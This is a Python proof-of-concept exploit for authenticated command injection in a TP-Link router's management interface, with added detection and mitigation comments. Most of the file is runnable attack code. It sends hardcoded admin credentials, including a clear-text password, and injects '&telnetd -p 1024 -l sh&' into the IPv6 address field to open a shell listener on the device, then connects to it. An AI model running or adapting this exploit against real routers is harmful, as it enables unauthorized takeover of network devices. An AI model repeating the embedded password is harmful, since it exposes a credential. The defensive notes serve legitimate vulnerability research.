#!/usr/bin/env python3
# Proof of concept for an authenticated OS command injection in a TP-Link
# router's web management interface, as written by the original author.
#
# What the script does, in order:
#   1. Builds an "Authorization=Basic ..." cookie from the admin credentials.
#   2. POSTs a WAN/IP configuration body to /cgi?2&2 with a well-formed IPv6
#      address ("::") in X_TP_ExternalIPv6Address.
#   3. POSTs the same body again with shell syntax in that field.
#   4. Opens a telnet session to the device on TCP port 1024.
#
# Defender notes:
#   - The requests carry valid admin credentials, so the issue sits behind
#     authentication; a weak or reused admin password is the precondition.
#   - The author labels X_TP_ExternalIPv6Address as the injection point.
#     Presumably the firmware hands the value to a shell without validating
#     it as an IPv6 address; the firmware side is not visible here.
#   - Detection: POSTs to the management CGI whose address fields contain
#     shell metacharacters ('&', ';', '|', backticks), a telnetd process
#     appearing on the device, or a new listener on TCP 1024.
#   - Mitigation: apply vendor firmware that validates the field, keep the
#     management interface off untrusted networks, and use a strong, unique
#     admin password.
import requests
import base64
import os

# NOTE(review): a device password is committed here in clear text. Treat it
# as exposed and rotate it on whichever device it belongs to.
tplink_user = "admin"
tplink_pass = "kj876fsd562489"
tplink_ip = "192.168.0.1"
tplink_url = f"http://{tplink_ip}/cgi?2&2"

# The management UI is addressed over plain HTTP, so this Basic-auth cookie
# crosses the network unencrypted.
creds = f"{tplink_user}:{tplink_pass}"
cookie = "Authorization=Basic " + base64.b64encode(creds.encode()).decode("ascii")
referer = f"http://{tplink_ip}/mainFrame.htm"
headers = {"Referer": referer, "Cookie": cookie}

post_exploit_cmd = f"telnet {tplink_ip} 1024"

# Static WAN/IP configuration body. Only X_TP_ExternalIPv6Address varies
# between the two requests; OS_INJECTION_HERE is the substitution marker.
payload_template = """[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1\r
X_TP_lastUsedIntf=ipoe_eth3_s\r
[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21\r
externalIPAddress=192.168.9.222\r
subnetMask=255.255.255.0\r
defaultGateway=192.168.9.2\r
NATEnabled=1\r
X_TP_FullconeNATEnabled=0\r
X_TP_FirewallEnabled=1\r
X_TP_IGMPProxyEnabled=1\r
X_TP_IGMPForceVersion=0\r
maxMTUSize=1500\r
DNSOverrideAllowed=1\r
DNSServers=192.168.9.3,0.0.0.0\r
X_TP_IPv4Enabled=1\r
X_TP_IPv6Enabled=0\r
X_TP_IPv6AddressingType=Static\r
X_TP_ExternalIPv6Address=OS_INJECTION_HERE\r
X_TP_PrefixLength=64\r
X_TP_DefaultIPv6Gateway=::\r
X_TP_IPv6DNSOverrideAllowed=0\r
X_TP_IPv6DNSServers=::,::\r
X_TP_MLDProxyEnabled=0\r
enable=1\r
"""

# First value is a valid IPv6 address (baseline request); the second is the
# author's injected value. Each response body is printed for comparison.
for ipv6_value in ("::", "&telnetd -p 1024 -l sh&"):
    payload = payload_template.replace("OS_INJECTION_HERE", ipv6_value)
    res = requests.post(tplink_url, data=payload, headers=headers)
    html = res.content.decode("utf-8")
    print(html)

print("Run post_exploit_cmd")
# Connects to TCP 1024 on the device; an answering shell there confirms the
# field reached a command interpreter.
os.system(post_exploit_cmd)